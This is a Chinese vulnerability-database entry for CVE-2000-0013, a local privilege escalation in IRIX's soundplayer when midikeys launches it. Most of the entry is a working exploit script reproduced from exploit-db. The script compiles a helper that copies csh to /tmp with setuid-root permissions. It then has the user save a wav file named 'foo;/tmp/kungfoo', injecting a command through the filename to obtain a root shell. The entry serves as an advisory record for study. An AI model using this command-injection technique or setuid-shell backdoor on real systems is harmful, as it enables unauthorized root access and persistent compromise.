IRIX midikeys/soundplayer 漏洞

IRIX midikeys/soundplayer 漏洞

漏洞ID 1105669 漏洞类型 输入验证
发布时间 1999-12-31 更新时间 2005-05-02
图片[1]-IRIX midikeys/soundplayer 漏洞-安全小百科CVE编号 CVE-2000-0013
图片[2]-IRIX midikeys/soundplayer 漏洞-安全小百科CNNVD-ID CNNVD-199912-197
漏洞平台 IRIX CVSS评分 7.2
|漏洞来源
https://www.exploit-db.com/exploits/19706
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-199912-197
|漏洞详情
IRIX声音播放程序存在漏洞,本地用户可以通过中间关键字程序在.wav文件中包含元字符获得权限。
|漏洞EXP
#!/bin/sh
#source: http://www.securityfocus.com/bid/909/info
#
#SGI's Irix operating system ships with an X11 application called 'soundplayer' which is used to play .WAV files. It is not setuid root by itself, but can inherit root privileges if called by midikeys (which is setuid on some old IRIX systems). Soundplayer is vulnerable to an input validation problem. When saving a file to disk with soundplayer, if a semicolon is appended to the end of the "proper" or "real" filename input followed by a command to be executed (no spaces), the command will run with the privileges soundplayer has (elevated or not). It is possible to compromise root access locally through exploitation of this vulnerability if soundplayer is executed (then exploited..) through setuid midikeys.
#

#!/bin/sh
#
# Irix 6.x soundplayer xploit - Loneguard 20/02/99
#
# Good example of how bad coding in a non-setuid/priviledged process
# can offer up rewt
#
cat > /tmp/crazymonkey.c << 'EOF'
main() {
setuid(0);
system("cp /bin/csh /tmp/xsh;chmod 4755 /tmp/xsh");
}
EOF
cc -o /tmp/kungfoo crazymonkey.c
/usr/sbin/midikeys &
echo "You should now see the midikeys window, goto the menu that allows you to play sounds and load a wav. This will bring
up a soundplayer window. Save the wav as 'foo;/tmp/kungfoo' and go find a rewt shell in tmp"
|参考资料

来源:BID
名称:909
链接:http://www.securityfocus.com/bid/909

相关推荐: Microsoft Windows H.323 Remote Buffer Overflow Vulnerability

Microsoft Windows H.323 Remote Buffer Overflow Vulnerability 漏洞ID 1098599 漏洞类型 Boundary Condition Error 发布时间 2004-04-13 更新时间 2004-…

© 版权声明
THE END
喜欢就支持一下吧
点赞0
分享